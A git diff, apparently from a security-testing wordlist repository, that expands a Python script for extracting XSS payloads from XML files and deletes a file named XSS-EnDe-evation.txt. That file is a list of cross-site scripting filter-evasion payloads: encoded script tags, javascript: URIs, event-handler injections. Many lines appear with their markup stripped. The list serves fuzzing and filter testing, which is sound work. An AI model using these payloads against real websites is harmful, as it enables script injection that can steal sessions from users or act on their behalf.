diff --git a/.bin/xml-parser.py b/.bin/xml-parser.py old mode 100644 new mode 100755 index 9d626aab..f5dd9b19 --- a/.bin/xml-parser.py +++ b/.bin/xml-parser.py @@ -2,9 +2,9 @@ import os import sys -import xml.etree.ElementTree as ET +import xml.etree.ElementTree as et -if not sys.argv[1]: +if len(sys.argv) == 1: exit(0) files=sys.argv[1].split(" ") @@ -15,4 +15,27 @@ for i in files: exit(2) for i in files: - ET \ No newline at end of file + xml_file = et.parse(i) + + contents = [] + + for j in xml_file.getroot().findall("attack"): + xss = j.find('code').text + + if not xss: + continue + + if "\n" in xss: + print("Xss have newline in it.") + print(xss, "\n") + + contents.append(xss) + + file_dir, file_name = i.rsplit("/", 1) + file_name = os.path.join(file_dir, file_name.rsplit(".", 1)[0] + ".txt") + + open(file_name, "w").write("\n".join(contents)) + + print(f"Wrote to {file_name}") + + \ No newline at end of file diff --git a/Fuzzing/XSS/XSS-EnDe-evation.txt b/Fuzzing/XSS/XSS-EnDe-evation.txt deleted file mode 100644 index 92e5a3bd..00000000 --- a/Fuzzing/XSS/XSS-EnDe-evation.txt +++ /dev/null @@ -1,217 +0,0 @@ -# =========================================================================== # -#? -#? NAME -#? xss-evation.txt -#? -#? SYNOPSIS -#? -#? DESCRIPTION -#? List of Cross-site Scriptings (XSS) samples. -#? Empty lines and lines starting with a # are comments and should be -#? ignored. All other lines contain one payload per line. -#? -# HACKER's INFO -# This file used in EnDe's "Load File" menu. -#? -#? VERSION -#? @(#) xss-evation.txt 1.5 13/05/12 10:51:43 -#? -#? AUTHOR -#? 10-jun-10 Achim Hoffmann, mailto: EnDe (at) my (dash) stp (dot) net -#? -# =========================================================================== # - -#group most-in-one pattern -"'`ʼˈ‘’‚‛“”„‟′″‴‵‶‷﹅﹐＂＇，舧艠︐︑--> -#group general filter evasion -"'> -"'> -"'> -"'> -"'> -"'> -"'> -"'> -"'><\script>confirm(42) -"'>confirm(42) -"'>confirm(42) -"'> -"'>alert(42) -"'><;(24)trela=daolno ;''=e>'=d -"'><;(24)trela=daolno ;''=/e>'=d -"'> -# real tab -"'>confirm(42) -# URL-encoded -"'%3e%3cscript%3econfirm(42)%3c/script%3e -"'%253e%253cscript%253econfirm(42)%253c/script%253e -"'%25253e%25253cscript%25253econfirm(42)%25253c/script%25253e -"'%u3e%u3cscript%u3econfirm(42)%u3c/script%u3e -"'%u003e%u003cscript%u003econfirm(42)%u003c/script%u003e -"'%25u003e%25u003cscript%25u003econfirm(42)%25u003c/script%25u003e -%22%27%3e%3cscript%3econfirm(42)%3c/script%3e -%u22%u27%u3e%u3cscript%u3econfirm(42)%u3c/script%u3e -%u0022%u0027%u003e%u003cscript%u003econfirm(42)%u003c/script%u003e -%2522%2527%253e%253cscript%253econfirm(42)%253c/script%253e -%252522%252527%25253e%25253cscript%25253econfirm(42)%25253c/script%25253e -%25u22%25u27%25u3e%25u3cscript%25u3econfirm(42)%25u3c/script%25u3e -%25u0022%25u0027%25u003e%25u003cscript%25u003econfirm(42)%25u003c/script%25u003e -# Unicode characters -"'> -"'ܾܼscriptܾalert(42)ܼܯscriptܾ -"'%07%3e%07%3cscript%07%3ealert(42)%07%3c/script%07%3e -"'%u073e%u073cscript%u073ealert(42)%u073c/script%u073e -%07%22%07%27%07%3e%07%3cscript%07%3ealert(42)%07%3c/script%07%3e -%u0722%u0727%u073e%u073cscript%u073ealert(42)%u073c/script%u073e -"'%2507%253e%2507%253cscript%2507%253ealert(42)%2507%253c/script%2507%253e -"'%25u073e%25u073cscript%25u073ealert(42)%25u073c/script%25u073e -%2507%2522%2507%2527%2507%253e%2507%253cscript%2507%253ealert(42)%2507%253c/script%2507%253e -%25u0722%25u0727%25u073e%25u073cscript%25u073ealert(42)%25u073c/script%25u073e -#group javascript keywords -javascript:alert(42) -javascript:prompt(42) -javascript:confirm(42) -jAvasCript:confirm(42) -jAvas\Cript:confirm(42) -jAvas Cript:confirm(42) -jAvas/* */Cript:confirm(42) - javascript:alert(42) -document -document. -top -top. -top[ -eval -eval( -cookie -.cookie -#group HTML event keywords -onerror -onerror= -onclick -onclick= -onmouseover -onmouseover= -onload -onload= -"onerror -"onerror= -"onclick -"onclick= -"onmouseover -"onmouseover= -"onload -"onload= -#group HTML tag attribute keywords -href= -src= -link= -style= -alt= -title= -egal= -"href= -"src= -"link= -"style= -"alt= -"title= -"egal= -#group HTML tag keywords - -

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

- - - - - - - - - - - -

- - - - - - - - -\x3Cscript>javascript:alert(1) -'"`> - - --->

--> ---> ---> ---> -`"'>

-test -test -test -test -test -test -test -test -test -test -test -test -test -test - - - - - - - -"'`>ABC

DEF -"'`>ABC

DEF -%253Cscript%253Ealert('XSS')%253C%252Fscript%253E - - - -'`"><\x3Cscript>javascript:alert(1) -'`"><\x00script>javascript:alert(1) -"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> -"'`><\x00img src=xxx:x onerror=javascript:alert(1)> - - - - -javascript:alert(1); -javascript:alert(1); -javascript:alert(1); -javascript:alert(1); -javascript:alert(1); -javascript:alert(1); -javascript:alert(1); -ABC

DEF -ABC

DEF -ABC

DEF -ABC

DEF -ABC

DEF -ABC

DEF -ABC

DEF -ABC

DEF -ABC

DEF -ABC

DEF -ABC

DEF -ABC

DEF -ABC

DEF -ABC

DEF -ABC

DEF -ABC

DEF -ABC

DEF -ABC

DEF -ABC

DEF -ABC

DEF -ABC

DEF -ABC

DEF -ABC

DEF -ABC

DEF -ABC

DEF -ABC

DEF -ABC

DEF -test -test -test -test -test -test -test -test -test -test -test -test -test -test -test -test -test -test -test -test -test -test -test -test -test -test -test -test -test -test -test -test -test -test -test -test -test -test -test -test -test -test -test -test -test -test -test -test -test -test -test -test -test -test -test -test -test -`"'>

-`"'>

-`"'>

-`"'>

-`"'>

-`"'>

-`"'>

-`"'>

-`"'>

-`"'>

-"`'> -"`'> -"`'> -"`'> -"`'> -"`'> -"`'> -"`'> -"`'> -"`'> -"`'> -"`'> -"`'> -"`'> -"`'> -"`'> -"`'> -"`'> -"`'> -"`'> -"`'> -"`'> -"`'> -"`'> -"`'> -"`'> -"`'> -"`'> -"`'> -"`'> -"`'> -"`'> -"`'> -"`'> -"`'> -"`'> -"`'> -"/> -"/> -"/> -"/> -"/> -"/> -"/> -"/> -"/> -javascript:alert(1) -javascript:alert(1) -javascript:alert(1) -javascript:alert(1) -javascript:alert(1) -javascript:alert(1) -javascript:alert(1) -`"'>

-`"'>

-`"'>

-`"'>

-`"'>

-`"'>

-`"'>

- -

-